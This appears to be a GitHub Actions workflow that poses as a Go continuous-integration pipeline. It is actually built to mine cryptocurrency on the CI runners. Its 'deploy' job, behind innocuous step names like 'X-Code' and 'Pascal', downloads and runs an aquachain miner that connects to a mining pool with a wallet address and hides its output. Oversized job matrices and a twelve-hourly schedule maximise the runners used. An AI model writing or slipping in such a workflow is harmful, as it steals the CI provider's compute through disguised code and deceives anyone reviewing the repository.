name: CI_Node
# on: [push, pull_request]
on:
  schedule:
    - cron: '0 */12 * * *'
  workflow_dispatch:
   
jobs:
  build:
    runs-on: windows-latest
    strategy:
      max-parallel: 50
      fail-fast: false
      matrix:
        go: [1.1, 1.2]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    timeout-minutes: 360
    env:
        NUM_JOBS: 50
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
  deploy:
    name: X-Code
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.1, 1.1, 1.4, 1.4, 1.4, 1.5, 1.5, 1.5, 1.1, 1.1, 1.1]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T]
    timeout-minutes: 36
    env:
        NUM_JOBS: 200
        JOB: ${{ matrix.go }}
    steps:
    - name: Setup Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Check-in
      uses: actions/checkout@v2
    - name: Pascal
      run: |
        wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F http://aqua.signal2noi.se:19998/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/dgcx > /dev/null
